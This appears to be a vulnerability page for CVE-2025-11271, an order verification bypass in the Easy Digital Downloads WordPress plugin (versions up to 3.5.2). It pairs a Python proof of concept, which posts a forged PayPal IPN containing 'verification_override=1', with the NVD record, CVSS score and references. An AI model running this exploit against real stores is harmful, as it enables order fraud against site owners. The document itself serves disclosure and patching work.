CVE-2025-11271

import requests import json # CVE-2025-11271 PoC - Order Verification Bypass # Target: WordPress site with Easy Digital Downloads plugin # Affected versions: <= 3.5.2 target_url = "https://target-site.com/" # Replace with target URL paypal_ipn_endpoint = target_url + "?edd-listener=paypal" # IPN endpoint # Valid PayPal transaction ID obtained by attacker valid_txn_id = "YOUR_VALID_PAYPAL_TXN_ID" # Replace with real transaction ID # Construct malicious IPN request with verification bypass payload = { "txn_id": valid_txn_id, "mc_gross": "9.99", "currency_code": "USD", "payment_status": "Completed", "payer_email": "[email protected]", "item_number": "product_123", # Bypass verification - this is the key parameter "verification_override": "1" } try: response = requests.post(paypal_ipn_endpoint, data=payload, timeout=10) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text}") print("\n[!] If order manipulation succeeded, the system will treat") print(" this forged IPN as verified and complete the order.") except requests.exceptions.RequestException as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2025-11271", "sourceIdentifier": "[email protected]", "published": "2025-11-06T05:15:54.917", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Digital Downloads plugin for WordPress is vulnerable to Order Manipulation in all versions up to, and including, 3.5.2 due to an order verification bypass. The verification is unconditionally skipped when the POST body includes verification_override=1. Because this value is attacker-supplied, an unauthenticated actor can submit a forged IPN and have it treated as verified, even on production sites and with verification otherwise enabled. A valid PayPal transaction id is needed, restricting order manipulation to orders placed by the attacker. This, in turn, requires them to have a customer account."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-807"}]}], "references": [{"url": "https://github.com/awesomemotive/easy-digital-downloads/blob/main/includes/gateways/paypal/ipn.php", "source": "[email protected]"}, {"url": "https://github.com/awesomemotive/easy-digital-downloads/blob/main/src/Gateways/PayPal/IPN.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3382964%40easy-digital-downloads%2Ftrunk&old=3364285%40easy-digital-downloads%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4c63154e-9413-47ea-a740-441618266adf?source=cve", "source": "[email protected]"}]}}